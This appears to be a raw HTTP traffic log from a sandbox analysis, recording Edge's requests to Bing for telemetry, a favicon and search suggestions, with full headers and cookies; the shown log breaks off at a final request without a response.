Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:51 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144351.fb6b6f0
POST

https://www.bing.com/orgid/idtoken/conditional

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /orgid/idtoken/conditional HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 693
Cache-Control: max-age=0
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
Origin: https://login.microsoftonline.com
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://login.microsoftonline.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; ipv6=hit=1728147938444&t=4; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 25
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 670163df29a24487932076d024cb3ee8
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-8LQYii/qmekegqcVfsVLIi4R4FogMpWSQm/pdIjz0aw='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: FEF8B8741D524B8B99A6A35BC1E48FE4 Ref B: LON601060108060 Ref C: 2024-10-05T16:05:51Z
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:51 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=SID=09FC260B5D486508095E33045C4E641E; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144351.fb6b84d
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144350790%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144350790%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; USRLOC=HS=1&BLOCK=TS=241005160551

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144351.fb6b9c8
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 286
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:06:03 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144362.fb6baef
GET

https://www.bing.com/favicon.ico

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /favicon.ico HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=15552000
Content-Length: 4286
Content-Type: image/x-icon
Last-Modified: Mon, 01 Jan 1601 00:00:00 GMT
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 0FD04CFC1A1E485B9EBD8B31934F6D09 Ref B: LTSEDGE0810 Ref C: 2022-12-09T13:31:02Z
Date: Sat, 05 Oct 2024 16:06:03 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144363.fb70ab5
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.TabFocusChanged&DATA=%5B%7B%22T%22%3A%22CI.TabFocusChanged%22%2C%22TS%22%3A1728144443324%2C%22Name%22%3A%22visible%22%2C%22FID%22%3A%22TabFocused%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.TabFocusChanged&DATA=%5B%7B%22T%22%3A%22CI.TabFocusChanged%22%2C%22TS%22%3A1728144443324%2C%22Name%22%3A%22visible%22%2C%22FID%22%3A%22TabFocused%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:24 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144444.fb70bbd
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 606
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144452.fb95672
GET

https://www.bing.com/qbox?query=a&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=076f2260b571409a9f71f37c2377ce59&oit=1&cp=1&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=a&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=076f2260b571409a9f71f37c2377ce59&oit=1&cp=1&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
